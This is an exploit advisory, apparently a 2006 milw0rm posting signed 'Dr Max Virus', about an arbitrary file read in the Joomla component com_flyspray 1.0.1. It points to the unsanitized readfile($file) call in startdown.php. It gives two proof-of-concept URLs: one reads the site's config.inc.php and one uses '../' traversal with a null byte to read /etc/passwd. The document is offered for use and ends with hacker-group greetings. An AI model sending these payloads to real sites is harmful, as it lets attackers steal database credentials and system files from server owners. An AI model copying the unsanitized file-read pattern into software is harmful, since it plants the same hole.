33 lines
No EOL
1.7 KiB
Text
33 lines
No EOL
1.7 KiB
Text
_____ __ __ __ ___
|
|
| __ \ | \/ | \ \ / (_)
|
|
| | | |_ __ | \ / | __ ___ __ \ \ / / _ _ __ _ _ ___
|
|
| | | | '__| | |\/| |/ _` \ \/ / \ \/ / | | '__| | | / __|
|
|
| |__| | | | | | | (_| |> < \ / | | | | |_| \__ \
|
|
|_____/|_| |_| |_|\__,_/_/\_\ \/ |_|_| \__,_|___/
|
|
|
|
|
|
*****************************************************************************************************************************
|
|
Compononent name:com_flyspray
|
|
Affected Version:1.0.1
|
|
d.page:http://mamboxchange.com/frs/download.php/8304/com_flyspray_1.0.1.zip
|
|
*****************************************************************************************************************************
|
|
Authour: Dr Max Virus
|
|
Location:Egypt
|
|
*****************************************************************************************************************************
|
|
Bug in :startdown.php
|
|
Vul Code:
|
|
In Line 52:
|
|
readfile($file);
|
|
Problem:The variable of file not sanitized So u can read any file on server
|
|
and also config file
|
|
*****************************************************************************************************************************
|
|
POC:
|
|
|
|
http://[target]/[joomla_path]/components/com_flyspray/startdown.php?file=config.inc.php
|
|
http://[target]/[joomla_path]/components/com_flyspray/startdown.php?file=../../../../../etc/passwd%00
|
|
*****************************************************************************************************************************
|
|
Thx To:str0ke & Nukedx & Thehacker & All My Friends
|
|
Special Gr33Ts:ASIANEAGLE & The Master &Kacper
|
|
****************************************************************************************************************************
|
|
|
|
# milw0rm.com [2006-11-26] |